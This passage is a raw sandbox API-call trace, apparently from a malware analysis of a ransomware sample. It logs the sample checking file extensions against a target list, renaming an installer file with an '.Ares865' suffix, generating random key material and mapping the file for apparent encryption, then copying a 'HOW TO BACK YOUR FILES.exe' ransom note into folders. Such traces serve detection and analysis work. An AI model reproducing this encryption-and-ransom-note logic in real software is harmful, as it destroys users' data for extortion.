returned 1 [0077.163] lstrlenW (lpString="^^^") returned 3 [0077.163] lstrcmpiW (lpString1="msi", lpString2="^^^") returned 1 [0077.163] lstrlenW (lpString="abs") returned 3 [0077.167] lstrcmpiW (lpString1="msi", lpString2="abs") returned 1 [0077.167] lstrlenW (lpString="abx") returned 3 [0077.169] lstrcmpiW (lpString1="msi", lpString2="abx") returned 1 [0077.170] lstrlenW (lpString="accdb") returned 5 [0077.170] lstrcmpiW (lpString1="4.msi", lpString2="accdb") returned -1 [0077.171] lstrlenW (lpString="accdc") returned 5 [0077.171] lstrcmpiW (lpString1="4.msi", lpString2="accdc") returned -1 [0077.171] lstrlenW (lpString="accde") returned 5 [0077.171] lstrcmpiW (lpString1="4.msi", lpString2="accde") returned -1 [0077.171] lstrlenW (lpString="accdr") returned 5 [0077.171] lstrcmpiW (lpString1="4.msi", lpString2="accdr") returned -1 [0077.171] lstrlenW (lpString="accdt") returned 5 [0077.175] lstrcmpiW (lpString1="4.msi", lpString2="accdt") returned -1 [0077.175] lstrlenW (lpString="accdw") returned 5 [0077.175] lstrcmpiW (lpString1="4.msi", lpString2="accdw") returned -1 [0077.175] lstrlenW (lpString="accft") returned 5 [0077.175] lstrcmpiW (lpString1="4.msi", lpString2="accft") returned -1 [0077.175] lstrlenW (lpString="adb") returned 3 [0077.175] lstrcmpiW (lpString1="msi", lpString2="adb") returned 1 [0077.175] lstrlenW (lpString="adb") returned 3 [0077.175] lstrcmpiW (lpString1="msi", lpString2="adb") returned 1 [0077.176] lstrlenW (lpString="ade") returned 3 [0077.176] lstrcmpiW (lpString1="msi", lpString2="ade") returned 1 [0077.176] lstrlenW (lpString="adf") returned 3 [0077.178] lstrcmpiW (lpString1="msi", lpString2="adf") returned 1 [0077.178] lstrlenW (lpString="adn") returned 3 [0077.178] lstrcmpiW (lpString1="msi", lpString2="adn") returned 1 [0077.178] lstrlenW (lpString="adp") returned 3 [0077.181] lstrcmpiW (lpString1="msi", lpString2="adp") returned 1 [0077.181] lstrlenW (lpString="alf") returned 3 [0077.181] lstrcmpiW (lpString1="msi", lpString2="alf") returned 1 [0077.182] lstrlenW (lpString="ask") returned 3 [0077.182] lstrcmpiW (lpString1="msi", lpString2="ask") returned 1 [0077.182] lstrlenW (lpString="btr") returned 3 [0077.182] lstrcmpiW (lpString1="msi", lpString2="btr") returned 1 [0077.182] lstrlenW (lpString="cat") returned 3 [0077.186] lstrcmpiW (lpString1="msi", lpString2="cat") returned 1 [0077.186] lstrlenW (lpString="cdb") returned 3 [0077.186] lstrcmpiW (lpString1="msi", lpString2="cdb") returned 1 [0077.189] lstrlenW (lpString="ckp") returned 3 [0077.189] lstrcmpiW (lpString1="msi", lpString2="ckp") returned 1 [0077.189] lstrlenW (lpString="cma") returned 3 [0077.189] lstrcmpiW (lpString1="msi", lpString2="cma") returned 1 [0077.189] lstrlenW (lpString="cpd") returned 3 [0077.189] lstrcmpiW (lpString1="msi", lpString2="cpd") returned 1 [0077.189] lstrlenW (lpString="dacpac") returned 6 [0077.190] lstrcmpiW (lpString1="64.msi", lpString2="dacpac") returned -1 [0077.190] lstrlenW (lpString="dad") returned 3 [0077.191] lstrcmpiW (lpString1="msi", lpString2="dad") returned 1 [0077.191] lstrlenW (lpString="dadiagrams") returned 10 [0077.191] lstrcmpiW (lpString1="al_x64.msi", lpString2="dadiagrams") returned -1 [0077.194] lstrlenW (lpString="daschema") returned 8 [0077.194] lstrcmpiW (lpString1="_x64.msi", lpString2="daschema") returned -1 [0077.194] lstrlenW (lpString="db-journal") returned 10 [0077.195] lstrcmpiW (lpString1="al_x64.msi", lpString2="db-journal") returned -1 [0077.195] lstrlenW (lpString="db-shm") returned 6 [0077.195] lstrcmpiW (lpString1="64.msi", lpString2="db-shm") returned -1 [0077.195] lstrlenW (lpString="db-wal") returned 6 [0077.195] lstrcmpiW (lpString1="64.msi", lpString2="db-wal") returned -1 [0077.195] lstrlenW (lpString="dbc") returned 3 [0077.195] lstrcmpiW (lpString1="msi", lpString2="dbc") returned 1 [0077.195] lstrlenW (lpString="dbs") returned 3 [0077.195] lstrcmpiW (lpString1="msi", lpString2="dbs") returned 1 [0077.195] lstrlenW (lpString="dbt") returned 3 [0077.195] lstrcmpiW (lpString1="msi", lpString2="dbt") returned 1 [0077.195] lstrlenW (lpString="dbv") returned 3 [0077.195] lstrcmpiW (lpString1="msi", lpString2="dbv") returned 1 [0077.195] lstrlenW (lpString="dbx") returned 3 [0077.196] lstrcmpiW (lpString1="msi", lpString2="dbx") returned 1 [0077.196] lstrlenW (lpString="dcb") returned 3 [0077.196] lstrcmpiW (lpString1="msi", lpString2="dcb") returned 1 [0077.196] lstrlenW (lpString="dct") returned 3 [0077.196] lstrcmpiW (lpString1="msi", lpString2="dct") returned 1 [0077.196] lstrlenW (lpString="dcx") returned 3 [0077.196] lstrcmpiW (lpString1="msi", lpString2="dcx") returned 1 [0077.196] lstrlenW (lpString="ddl") returned 3 [0077.196] lstrcmpiW (lpString1="msi", lpString2="ddl") returned 1 [0077.196] lstrlenW (lpString="dlis") returned 4 [0077.196] lstrcmpiW (lpString1=".msi", lpString2="dlis") returned -1 [0077.196] lstrlenW (lpString="dp1") returned 3 [0077.196] lstrcmpiW (lpString1="msi", lpString2="dp1") returned 1 [0077.196] lstrlenW (lpString="dqy") returned 3 [0077.196] lstrcmpiW (lpString1="msi", lpString2="dqy") returned 1 [0077.196] lstrlenW (lpString="dsk") returned 3 [0077.196] lstrcmpiW (lpString1="msi", lpString2="dsk") returned 1 [0077.196] lstrlenW (lpString="dsn") returned 3 [0077.196] lstrcmpiW (lpString1="msi", lpString2="dsn") returned 1 [0077.196] lstrlenW (lpString="dtsx") returned 4 [0077.196] lstrcmpiW (lpString1=".msi", lpString2="dtsx") returned -1 [0077.196] lstrlenW (lpString="dxl") returned 3 [0077.196] lstrcmpiW (lpString1="msi", lpString2="dxl") returned 1 [0077.196] lstrlenW (lpString="eco") returned 3 [0077.196] lstrcmpiW (lpString1="msi", lpString2="eco") returned 1 [0077.196] lstrlenW (lpString="ecx") returned 3 [0077.200] lstrcmpiW (lpString1="msi", lpString2="ecx") returned 1 [0077.201] lstrlenW (lpString="edb") returned 3 [0077.201] lstrcmpiW (lpString1="msi", lpString2="edb") returned 1 [0077.201] lstrlenW (lpString="epim") returned 4 [0077.201] lstrcmpiW (lpString1=".msi", lpString2="epim") returned -1 [0077.201] lstrlenW (lpString="fcd") returned 3 [0077.201] lstrcmpiW (lpString1="msi", lpString2="fcd") returned 1 [0077.201] lstrlenW (lpString="fdb") returned 3 [0077.202] lstrcmpiW (lpString1="msi", lpString2="fdb") returned 1 [0077.202] lstrlenW (lpString="fic") returned 3 [0077.202] lstrcmpiW (lpString1="msi", lpString2="fic") returned 1 [0077.202] lstrlenW (lpString="flexolibrary") returned 12 [0077.202] lstrcmpiW (lpString1="onal_x64.msi", lpString2="flexolibrary") returned 1 [0077.202] lstrlenW (lpString="fm5") returned 3 [0077.202] lstrcmpiW (lpString1="msi", lpString2="fm5") returned 1 [0077.202] lstrlenW (lpString="fmp") returned 3 [0077.202] lstrcmpiW (lpString1="msi", lpString2="fmp") returned 1 [0077.202] lstrlenW (lpString="fmp12") returned 5 [0077.202] lstrcmpiW (lpString1="4.msi", lpString2="fmp12") returned -1 [0077.202] lstrlenW (lpString="fmpsl") returned 5 [0077.202] lstrcmpiW (lpString1="4.msi", lpString2="fmpsl") returned -1 [0077.202] lstrlenW (lpString="fol") returned 3 [0077.202] lstrcmpiW (lpString1="msi", lpString2="fol") returned 1 [0077.202] lstrlenW (lpString="fp3") returned 3 [0077.202] lstrcmpiW (lpString1="msi", lpString2="fp3") returned 1 [0077.202] lstrlenW (lpString="fp4") returned 3 [0077.202] lstrcmpiW (lpString1="msi", lpString2="fp4") returned 1 [0077.202] lstrlenW (lpString="fp5") returned 3 [0077.202] lstrcmpiW (lpString1="msi", lpString2="fp5") returned 1 [0077.202] lstrlenW (lpString="fp7") returned 3 [0077.202] lstrcmpiW (lpString1="msi", lpString2="fp7") returned 1 [0077.202] lstrlenW (lpString="fpt") returned 3 [0077.202] lstrcmpiW (lpString1="msi", lpString2="fpt") returned 1 [0077.202] lstrlenW (lpString="frm") returned 3 [0077.202] lstrcmpiW (lpString1="msi", lpString2="frm") returned 1 [0077.202] lstrlenW (lpString="gdb") returned 3 [0077.202] lstrcmpiW (lpString1="msi", lpString2="gdb") returned 1 [0077.202] lstrlenW (lpString="gdb") returned 3 [0077.202] lstrcmpiW (lpString1="msi", lpString2="gdb") returned 1 [0077.202] lstrlenW (lpString="grdb") returned 4 [0077.202] lstrcmpiW (lpString1=".msi", lpString2="grdb") returned -1 [0077.202] lstrlenW (lpString="gwi") returned 3 [0077.202] lstrcmpiW (lpString1="msi", lpString2="gwi") returned 1 [0077.202] lstrlenW (lpString="hdb") returned 3 [0077.202] lstrcmpiW (lpString1="msi", lpString2="hdb") returned 1 [0077.203] lstrlenW (lpString="his") returned 3 [0077.203] lstrcmpiW (lpString1="msi", lpString2="his") returned 1 [0077.203] lstrlenW (lpString="ib") returned 2 [0077.203] lstrcmpiW (lpString1="si", lpString2="ib") returned 1 [0077.203] lstrlenW (lpString="idb") returned 3 [0077.203] lstrcmpiW (lpString1="msi", lpString2="idb") returned 1 [0077.203] lstrlenW (lpString="ihx") returned 3 [0077.203] lstrcmpiW (lpString1="msi", lpString2="ihx") returned 1 [0077.203] lstrlenW (lpString="itdb") returned 4 [0077.203] lstrcmpiW (lpString1=".msi", lpString2="itdb") returned -1 [0077.203] lstrlenW (lpString="itw") returned 3 [0077.203] lstrcmpiW (lpString1="msi", lpString2="itw") returned 1 [0077.203] lstrlenW (lpString="jet") returned 3 [0077.203] lstrcmpiW (lpString1="msi", lpString2="jet") returned 1 [0077.203] lstrlenW (lpString="jtx") returned 3 [0077.203] lstrcmpiW (lpString1="msi", lpString2="jtx") returned 1 [0077.203] lstrlenW (lpString="kdb") returned 3 [0077.203] lstrcmpiW (lpString1="msi", lpString2="kdb") returned 1 [0077.203] lstrlenW (lpString="kexi") returned 4 [0077.203] lstrcmpiW (lpString1=".msi", lpString2="kexi") returned -1 [0077.203] lstrlenW (lpString="kexic") returned 5 [0077.203] lstrcmpiW (lpString1="4.msi", lpString2="kexic") returned -1 [0077.203] lstrlenW (lpString="kexis") returned 5 [0077.203] lstrcmpiW (lpString1="4.msi", lpString2="kexis") returned -1 [0077.203] lstrlenW (lpString="lgc") returned 3 [0077.203] lstrcmpiW (lpString1="msi", lpString2="lgc") returned 1 [0077.203] lstrlenW (lpString="lwx") returned 3 [0077.203] lstrcmpiW (lpString1="msi", lpString2="lwx") returned 1 [0077.203] lstrlenW (lpString="maf") returned 3 [0077.203] lstrcmpiW (lpString1="msi", lpString2="maf") returned 1 [0077.203] lstrlenW (lpString="maq") returned 3 [0077.203] lstrcmpiW (lpString1="msi", lpString2="maq") returned 1 [0077.203] lstrlenW (lpString="mar") returned 3 [0077.203] lstrcmpiW (lpString1="msi", lpString2="mar") returned 1 [0077.203] lstrlenW (lpString="marshal") returned 7 [0077.203] lstrcmpiW (lpString1="x64.msi", lpString2="marshal") returned 1 [0077.203] lstrlenW (lpString="mas") returned 3 [0077.203] lstrcmpiW (lpString1="msi", lpString2="mas") returned 1 [0077.204] lstrlenW (lpString="mav") returned 3 [0077.204] lstrcmpiW (lpString1="msi", lpString2="mav") returned 1 [0077.204] lstrlenW (lpString="maw") returned 3 [0077.204] lstrcmpiW (lpString1="msi", lpString2="maw") returned 1 [0077.204] lstrlenW (lpString="mdbhtml") returned 7 [0077.204] lstrcmpiW (lpString1="x64.msi", lpString2="mdbhtml") returned 1 [0077.204] lstrlenW (lpString="mdn") returned 3 [0077.204] lstrcmpiW (lpString1="msi", lpString2="mdn") returned 1 [0077.204] lstrlenW (lpString="mdt") returned 3 [0077.204] lstrcmpiW (lpString1="msi", lpString2="mdt") returned 1 [0077.204] lstrlenW (lpString="mfd") returned 3 [0077.204] lstrcmpiW (lpString1="msi", lpString2="mfd") returned 1 [0077.204] lstrlenW (lpString="mpd") returned 3 [0077.204] lstrcmpiW (lpString1="msi", lpString2="mpd") returned 1 [0077.204] lstrlenW (lpString="mrg") returned 3 [0077.204] lstrcmpiW (lpString1="msi", lpString2="mrg") returned 1 [0077.204] lstrlenW (lpString="mud") returned 3 [0077.204] lstrcmpiW (lpString1="msi", lpString2="mud") returned -1 [0077.204] lstrlenW (lpString="mwb") returned 3 [0077.204] lstrcmpiW (lpString1="msi", lpString2="mwb") returned -1 [0077.204] lstrlenW (lpString="myd") returned 3 [0077.204] lstrcmpiW (lpString1="msi", lpString2="myd") returned -1 [0077.204] lstrlenW (lpString="ndf") returned 3 [0077.204] lstrcmpiW (lpString1="msi", lpString2="ndf") returned -1 [0077.204] lstrlenW (lpString="nnt") returned 3 [0077.204] lstrcmpiW (lpString1="msi", lpString2="nnt") returned -1 [0077.204] lstrlenW (lpString="nrmlib") returned 6 [0077.204] lstrcmpiW (lpString1="64.msi", lpString2="nrmlib") returned -1 [0077.204] lstrlenW (lpString="ns2") returned 3 [0077.204] lstrcmpiW (lpString1="msi", lpString2="ns2") returned -1 [0077.204] lstrlenW (lpString="ns3") returned 3 [0077.204] lstrcmpiW (lpString1="msi", lpString2="ns3") returned -1 [0077.204] lstrlenW (lpString="ns4") returned 3 [0077.204] lstrcmpiW (lpString1="msi", lpString2="ns4") returned -1 [0077.204] lstrlenW (lpString="nsf") returned 3 [0077.204] lstrcmpiW (lpString1="msi", lpString2="nsf") returned -1 [0077.204] lstrlenW (lpString="nv") returned 2 [0077.204] lstrcmpiW (lpString1="si", lpString2="nv") returned 1 [0077.205] lstrlenW (lpString="nv2") returned 3 [0077.205] lstrcmpiW (lpString1="msi", lpString2="nv2") returned -1 [0077.205] lstrlenW (lpString="nwdb") returned 4 [0077.205] lstrcmpiW (lpString1=".msi", lpString2="nwdb") returned -1 [0077.205] lstrlenW (lpString="nyf") returned 3 [0077.205] lstrcmpiW (lpString1="msi", lpString2="nyf") returned -1 [0077.205] lstrlenW (lpString="odb") returned 3 [0077.205] lstrcmpiW (lpString1="msi", lpString2="odb") returned -1 [0077.205] lstrlenW (lpString="odb") returned 3 [0077.205] lstrcmpiW (lpString1="msi", lpString2="odb") returned -1 [0077.205] lstrlenW (lpString="oqy") returned 3 [0077.205] lstrcmpiW (lpString1="msi", lpString2="oqy") returned -1 [0077.205] lstrlenW (lpString="ora") returned 3 [0077.207] lstrcmpiW (lpString1="msi", lpString2="ora") returned -1 [0077.207] lstrlenW (lpString="orx") returned 3 [0077.207] lstrcmpiW (lpString1="msi", lpString2="orx") returned -1 [0077.209] lstrlenW (lpString="owc") returned 3 [0077.209] lstrcmpiW (lpString1="msi", lpString2="owc") returned -1 [0077.209] lstrlenW (lpString="p96") returned 3 [0077.209] lstrcmpiW (lpString1="msi", lpString2="p96") returned -1 [0077.209] lstrlenW (lpString="p97") returned 3 [0077.209] lstrcmpiW (lpString1="msi", lpString2="p97") returned -1 [0077.210] lstrlenW (lpString="pan") returned 3 [0077.216] lstrcmpiW (lpString1="msi", lpString2="pan") returned -1 [0077.216] lstrlenW (lpString="pdb") returned 3 [0077.216] lstrcmpiW (lpString1="msi", lpString2="pdb") returned -1 [0077.217] lstrlenW (lpString="pdm") returned 3 [0077.217] lstrcmpiW (lpString1="msi", lpString2="pdm") returned -1 [0077.217] lstrlenW (lpString="pnz") returned 3 [0077.217] lstrcmpiW (lpString1="msi", lpString2="pnz") returned -1 [0077.217] lstrlenW (lpString="qry") returned 3 [0077.219] lstrcmpiW (lpString1="msi", lpString2="qry") returned -1 [0077.219] lstrlenW (lpString="qvd") returned 3 [0077.219] lstrcmpiW (lpString1="msi", lpString2="qvd") returned -1 [0077.219] lstrlenW (lpString="rbf") returned 3 [0077.221] lstrcmpiW (lpString1="msi", lpString2="rbf") returned -1 [0077.221] lstrlenW (lpString="rctd") returned 4 [0077.222] lstrcmpiW (lpString1=".msi", lpString2="rctd") returned -1 [0077.222] lstrlenW (lpString="rod") returned 3 [0077.223] lstrcmpiW (lpString1="msi", lpString2="rod") returned -1 [0077.223] lstrlenW (lpString="rodx") returned 4 [0077.223] lstrcmpiW (lpString1=".msi", lpString2="rodx") returned -1 [0077.223] lstrlenW (lpString="rpd") returned 3 [0077.223] lstrcmpiW (lpString1="msi", lpString2="rpd") returned -1 [0077.223] lstrlenW (lpString="rsd") returned 3 [0077.223] lstrcmpiW (lpString1="msi", lpString2="rsd") returned -1 [0077.235] lstrlenW (lpString="sas7bdat") returned 8 [0077.235] lstrcmpiW (lpString1="_x64.msi", lpString2="sas7bdat") returned -1 [0077.235] lstrlenW (lpString="sbf") returned 3 [0077.235] lstrcmpiW (lpString1="msi", lpString2="sbf") returned -1 [0077.236] lstrlenW (lpString="scx") returned 3 [0077.236] lstrcmpiW (lpString1="msi", lpString2="scx") returned -1 [0077.236] lstrlenW (lpString="sdb") returned 3 [0077.236] lstrcmpiW (lpString1="msi", lpString2="sdb") returned -1 [0077.236] lstrlenW (lpString="sdc") returned 3 [0077.237] lstrcmpiW (lpString1="msi", lpString2="sdc") returned -1 [0077.237] lstrlenW (lpString="sdf") returned 3 [0077.237] lstrcmpiW (lpString1="msi", lpString2="sdf") returned -1 [0077.237] lstrlenW (lpString="sis") returned 3 [0077.237] lstrcmpiW (lpString1="msi", lpString2="sis") returned -1 [0077.237] lstrlenW (lpString="spq") returned 3 [0077.237] lstrcmpiW (lpString1="msi", lpString2="spq") returned -1 [0077.237] lstrlenW (lpString="te") returned 2 [0077.237] lstrcmpiW (lpString1="si", lpString2="te") returned -1 [0077.237] lstrlenW (lpString="teacher") returned 7 [0077.237] lstrcmpiW (lpString1="x64.msi", lpString2="teacher") returned 1 [0077.237] lstrlenW (lpString="tmd") returned 3 [0077.237] lstrcmpiW (lpString1="msi", lpString2="tmd") returned -1 [0077.239] lstrlenW (lpString="tps") returned 3 [0077.239] lstrcmpiW (lpString1="msi", lpString2="tps") returned -1 [0077.239] lstrlenW (lpString="trc") returned 3 [0077.239] lstrcmpiW (lpString1="msi", lpString2="trc") returned -1 [0077.242] lstrlenW (lpString="trc") returned 3 [0077.242] lstrcmpiW (lpString1="msi", lpString2="trc") returned -1 [0077.242] lstrlenW (lpString="trm") returned 3 [0077.242] lstrcmpiW (lpString1="msi", lpString2="trm") returned -1 [0077.242] lstrlenW (lpString="udb") returned 3 [0077.242] lstrcmpiW (lpString1="msi", lpString2="udb") returned -1 [0077.243] lstrlenW (lpString="udl") returned 3 [0077.243] lstrcmpiW (lpString1="msi", lpString2="udl") returned -1 [0077.243] lstrlenW (lpString="usr") returned 3 [0077.243] lstrcmpiW (lpString1="msi", lpString2="usr") returned -1 [0077.243] lstrlenW (lpString="v12") returned 3 [0077.243] lstrcmpiW (lpString1="msi", lpString2="v12") returned -1 [0077.243] lstrlenW (lpString="vis") returned 3 [0077.248] lstrcmpiW (lpString1="msi", lpString2="vis") returned -1 [0077.248] lstrlenW (lpString="vpd") returned 3 [0077.248] lstrcmpiW (lpString1="msi", lpString2="vpd") returned -1 [0077.249] lstrlenW (lpString="vvv") returned 3 [0077.249] lstrcmpiW (lpString1="msi", lpString2="vvv") returned -1 [0077.249] lstrlenW (lpString="wdb") returned 3 [0077.249] lstrcmpiW (lpString1="msi", lpString2="wdb") returned -1 [0077.249] lstrlenW (lpString="wmdb") returned 4 [0077.249] lstrcmpiW (lpString1=".msi", lpString2="wmdb") returned -1 [0077.249] lstrlenW (lpString="wrk") returned 3 [0077.249] lstrcmpiW (lpString1="msi", lpString2="wrk") returned -1 [0077.254] lstrlenW (lpString="xdb") returned 3 [0077.254] lstrcmpiW (lpString1="msi", lpString2="xdb") returned -1 [0077.254] lstrlenW (lpString="xld") returned 3 [0077.254] lstrcmpiW (lpString1="msi", lpString2="xld") returned -1 [0077.255] lstrlenW (lpString="xmlff") returned 5 [0077.255] lstrcmpiW (lpString1="4.msi", lpString2="xmlff") returned -1 [0077.255] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\All Users\\Package Cache\\{929FBD26-9020-399B-9A7A-751D61F0B942}v12.0.21005\\packages\\vcRuntimeAdditional_amd64\\vc_runtimeAdditional_x64.msi.Ares865") returned 154 [0077.255] MoveFileExW (lpExistingFileName="C:\\Users\\All Users\\Package Cache\\{929FBD26-9020-399B-9A7A-751D61F0B942}v12.0.21005\\packages\\vcRuntimeAdditional_amd64\\vc_runtimeAdditional_x64.msi" (normalized: "c:\\users\\all users\\package cache\\{929fbd26-9020-399b-9a7a-751d61f0b942}v12.0.21005\\packages\\vcruntimeadditional_amd64\\vc_runtimeadditional_x64.msi"), lpNewFileName="C:\\Users\\All Users\\Package Cache\\{929FBD26-9020-399B-9A7A-751D61F0B942}v12.0.21005\\packages\\vcRuntimeAdditional_amd64\\vc_runtimeAdditional_x64.msi.Ares865" (normalized: "c:\\users\\all users\\package cache\\{929fbd26-9020-399b-9a7a-751d61f0b942}v12.0.21005\\packages\\vcruntimeadditional_amd64\\vc_runtimeadditional_x64.msi.ares865"), dwFlags=0x1) returned 1 [0077.271] CreateFileW (lpFileName="C:\\Users\\All Users\\Package Cache\\{929FBD26-9020-399B-9A7A-751D61F0B942}v12.0.21005\\packages\\vcRuntimeAdditional_amd64\\vc_runtimeAdditional_x64.msi.Ares865" (normalized: "c:\\users\\all users\\package cache\\{929fbd26-9020-399b-9a7a-751d61f0b942}v12.0.21005\\packages\\vcruntimeadditional_amd64\\vc_runtimeadditional_x64.msi.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0xa4 [0077.271] GetFileSizeEx (in: hFile=0xa4, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=143360) returned 1 [0077.271] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x200300) returned 0x3240020 [0077.271] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2d31c0 [0077.271] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x80) returned 0x2f0518 [0077.271] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0270) returned 1 [0077.272] CryptGenRandom (in: hProv=0x2f0270, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0077.272] CryptReleaseContext (hProv=0x2f0270, dwFlags=0x0) returned 1 [0077.272] CreateFileMappingW (hFile=0xa4, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x23300, lpName=0x0) returned 0x154 [0077.273] MapViewOfFile (hFileMappingObject=0x154, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x23300) returned 0x420000 [0077.281] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0270) returned 1 [0077.282] CryptGenRandom (in: hProv=0x2f0270, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0077.282] CryptReleaseContext (hProv=0x2f0270, dwFlags=0x0) returned 1 [0077.282] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2d3058 [0077.282] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d3058 | out: hHeap=0x2b0000) returned 1 [0077.282] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x100) returned 0x332fc8 [0077.282] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x104) returned 0x324fc8 [0077.282] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x332fc8 | out: hHeap=0x2b0000) returned 1 [0077.282] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x104) returned 0x3250e0 [0077.282] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x208) returned 0x2d9d88 [0077.283] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x3250e0 | out: hHeap=0x2b0000) returned 1 [0077.283] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d9d88 | out: hHeap=0x2b0000) returned 1 [0077.283] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x324fc8 | out: hHeap=0x2b0000) returned 1 [0077.283] UnmapViewOfFile (lpBaseAddress=0x420000) returned 1 [0077.284] CloseHandle (hObject=0x154) returned 1 [0077.284] CloseHandle (hObject=0xa4) returned 1 [0077.284] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d31c0 | out: hHeap=0x2b0000) returned 1 [0077.284] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2f0518 | out: hHeap=0x2b0000) returned 1 [0077.284] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x3240020 | out: hHeap=0x2b0000) returned 1 [0077.285] FindNextFileW (in: hFindFile=0x2ccda8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7a38c100, ftCreationTime.dwHighDateTime=0x1cf3dd2, ftLastAccessTime.dwLowDateTime=0x7a38c100, ftLastAccessTime.dwHighDateTime=0x1cf3dd2, ftLastWriteTime.dwLowDateTime=0x7a38c100, ftLastWriteTime.dwHighDateTime=0x1cf3dd2, nFileSizeHigh=0x0, nFileSizeLow=0x23000, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="vc_runtimeAdditional_x64.msi", cAlternateFileName="VC_RUN~1.MSI")) returned 0 [0077.285] FindClose (in: hFindFile=0x2ccda8 | out: hFindFile=0x2ccda8) returned 1 [0077.285] RtlInterlockedPopEntrySList (in: ListHead=0x2e7710 | out: ListHead=0x2e7710) returned 0x2d2268 [0077.285] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\All Users\\Package Cache\\{8D4F7A6D-6B81-3DC8-9C21-6008E4866727}v14.10.25017", iMaxLength=260 | out: lpString1="C:\\Users\\All Users\\Package Cache\\{8D4F7A6D-6B81-3DC8-9C21-6008E4866727}v14.10.25017") returned="C:\\Users\\All Users\\Package Cache\\{8D4F7A6D-6B81-3DC8-9C21-6008E4866727}v14.10.25017" [0077.285] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e29d0 | out: hHeap=0x2b0000) returned 1 [0077.285] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d2260 | out: hHeap=0x2b0000) returned 1 [0077.285] lstrlenW (lpString="C:\\Users\\All Users\\Package Cache\\{8D4F7A6D-6B81-3DC8-9C21-6008E4866727}v14.10.25017") returned 83 [0077.285] lstrcatW (in: lpString1="", lpString2="C:\\Users\\All Users\\Package Cache\\{8D4F7A6D-6B81-3DC8-9C21-6008E4866727}v14.10.25017" | out: lpString1="C:\\Users\\All Users\\Package Cache\\{8D4F7A6D-6B81-3DC8-9C21-6008E4866727}v14.10.25017") returned="C:\\Users\\All Users\\Package Cache\\{8D4F7A6D-6B81-3DC8-9C21-6008E4866727}v14.10.25017" [0077.285] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0077.285] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\All Users\\Package Cache\\{8D4F7A6D-6B81-3DC8-9C21-6008E4866727}v14.10.25017\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\all users\\package cache\\{8d4f7a6d-6b81-3dc8-9c21-6008e4866727}v14.10.25017\\how to back your files.exe"), bFailIfExists=1) returned 0 [0077.286] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0077.286] GetLastError () returned 0x0 [0077.286] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x1dc00) returned 0x336fb0 [0077.286] ReadFile (in: hFile=0x120, lpBuffer=0x336fb0, nNumberOfBytesToRead=0x1dc00, lpNumberOfBytesRead=0x2cce0dc, lpOverlapped=0x0 | out: lpBuffer=0x336fb0*, lpNumberOfBytesRead=0x2cce0dc*=0x1dc00, lpOverlapped=0x0) returned 1 [0077.286] CloseHandle (hObject=0x120) returned 1 [0077.286] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x336fb0 | out: hHeap=0x2b0000) returned 1 [0077.286] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0077.286] FindFirstFileW (in: lpFileName="C:\\Users\\All Users\\Package Cache\\{8D4F7A6D-6B81-3DC8-9C21-6008E4866727}v14.10.25017\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xa931c450, ftCreationTime.dwHighDateTime=0x1d2fab4, ftLastAccessTime.dwLowDateTime=0x4c1e5280, 